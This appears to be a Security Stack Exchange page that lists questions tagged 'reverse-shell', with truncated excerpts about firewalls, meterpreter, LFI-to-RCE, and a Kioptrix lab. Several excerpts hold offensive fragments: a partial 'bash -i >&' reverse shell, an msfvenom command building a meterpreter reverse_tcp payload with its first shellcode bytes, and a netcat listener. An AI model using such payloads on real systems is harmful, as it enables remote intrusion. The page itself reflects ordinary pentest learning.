Questions tagged [reverse-shell]

49 questions
0
votes
1 answer

Getting reverse shell from firewalled target

Suppose this scenario: You are already inside a corporate network. Suppose to find out a RCE in a X service. The machine that hosts that service is behind a network-based firewall, ingress rules and IPS/IDS are not a problem. You don't need to reach…
hyogy
  • 3
  • 4
0
votes
0 answers

Can I inject shell in the below php code?

How I can inject a shell command in the below code?
0
votes
2 answers

UFW does not block meterpreter

I am doing some pen testing on my wordpress server. I wanted to see what would happen if the attacker were to get a hold of my username and password for wordpress. So I used the standard exploit in msfconsole wp_admin_shell_upload and set password…
Linux
  • 1
0
votes
0 answers

Access to Reverse Shell from another network

If when we have a reverse shell and get persistence and we try to access the compromised target from another network different from the one which we created the payload, is that access to the compromised target still possible or only from the…
0
votes
0 answers

Reverse shell from backdoor - exposing attacker?

If an attacker successfully installed a backdoor that connects to his computer via a reverse shell, how can the attacker hide his IP address? I'd guess he can't use Tor or a VPN, because packet forwarding would be quite impossible (is that…
0
votes
1 answer

LFI to RCE through User-Agent

I'm doing a pentest on a FreeBSD machine running CuppaCMS. Already managed to login into the CMS with admin privilege, but it only takes me to a manager menu, with some options to change some tables and stuff like that, no RCE visible escalation. So…
0
votes
0 answers

Why to use Reverse Shell?

I know that reverse shells get the victim to connect to us, but I heard that people mostly use reverse shells Why use reverse shells when hacking a network outside our local network as we have to do port forwarding? It only brings some extra work.
user235696
0
votes
3 answers

Php intermediate shell

Is there any way that i can use the compromised website as the shell What i am trying to achieve is to get a reverse shell on the machine,not a webshell.The target machine has a website hosted on it open to public.The machine is behind a waf so all…
ElementX
  • 1
  • 1
0
votes
0 answers

Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn't work?

I've completed kioptrix level 2 challenge via sql injection, command injection, bash reverse shell, and local privilege escalation as part of my OSCP preparation. https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ ; bash -i >&…
Wolf
  • 347
  • 2
  • 3
  • 15
0
votes
1 answer

When using metasploit with my python reverse shell script I get a byte error, but it seems to work fine when using a netcat listener

When I run my python script and use netcat -nvlp 4444 the connection establishes fine and I am able to use the functions. When attempting to replicate this in metasploit I use set payload windows/x64/shell/reverse_tcp then I set the LHOST and LPORT…
0
votes
1 answer

How do you securely give access to a Java App interactive console (Linux/GNU)?

I have a Java App running, which prints out messages into STDOUT and also has an active interactive console (also accepts STDIN), when the server has started up. How do I securely give access to an external person (outside the network) to the…
Sir Muffington
  • 1,447
  • 2
  • 9
  • 22
0
votes
1 answer

What is bindshell backdoor?

I just found out a bindshell backdoor, but I don't know how to access/connect to it using Metasploit. I'm a beginner with exploiting; is there a way to access the backdoor? I tried to search for "bindshell" on Metasploit but I didn't find anything.…
Tenchu
  • 5
  • 1
  • 3
0
votes
0 answers

How is it possible for people to reverse a GoToAssist session?

I am puzzled by how people on Youtube bait scammers into connecting to their machines and end up "reversing" the connection on them. Essentially controlling the scammer's PC. Is this done via reverse shells ? Or do you get them to open up a…
ng.newbie
  • 265
  • 2
  • 6
0
votes
1 answer

Metasploit - Does the multi handler sends the payload, or just listens for connection

Does the metasploit module: exploit/multi/handler sends payloads to stagers? Or does it just listens for an incoming connection like a netcat listener? Or does it do both, as needed?
0x5929
  • 335
  • 4
  • 13
0
votes
1 answer

Executing shellcode in python format

So after running the command: msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.31 lport=8080 -f py I receive the output: buf = b"" buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf +=…